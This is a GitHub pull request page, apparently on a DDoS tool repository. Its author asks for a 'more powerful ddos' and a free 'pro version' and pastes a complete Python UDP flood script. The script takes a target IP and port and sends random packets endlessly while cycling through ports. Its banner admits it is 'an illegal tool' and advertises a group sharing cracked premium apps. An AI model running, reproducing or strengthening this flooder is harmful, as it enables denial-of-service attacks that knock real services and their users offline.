Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update README.md #70

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Update README.md #70

wants to merge 1 commit into from

Conversation

Yamrajjjii
Copy link

You have to create more powerful ddos.
Which attack faster than this attack.
This is old website was scure for this attack.

You have to create more powerful ddos. 
Which attack faster than this attack.
This is old website was scure for this attack.
@Yamrajjjii
Copy link
Author

Yamrajjjii commented Jul 1, 2024

You have to free the pro version of this ddos.
You become a hero. You are hero
So free pro version for all

[print ("\033[91m")
import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system("clear")
os.system("figlet yamrajii")
print
print "Coded By : yamrajjjii"
print "Author : Yamrajjjii"
print "Github : github.com/Yamrajjjii"
print "Fb Page : facebook.com/Yamrajjjii"
print "FB Group : facebook.com/groups/Yamrajjjii"
print "Telegram : t.me/Yamrajjjii"
print "Join Cracker Space yamrajjjii Group To Get Premium Apk(s) Free"
print "Note- This Tool An Illegal Tool & It's Only For Educational Purpose.. Use It At Your Own Risk,We'll Be Not Responsible For Kind Of Problems"
print
ip = raw_input("IP Target : ")
port = input("Port : ")
os.system("clear")
print("\033[93m")
os.system("figlet DdoS Yamrajjj")
print("Team : Yamrajjjii")
print ("\03392m")
print "[ ] 0% "
time.sleep(5)
print "[===== ] 25%"
time.sleep(5)
print "[========== ] 50%"
time.sleep(5)
print "[=============== ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant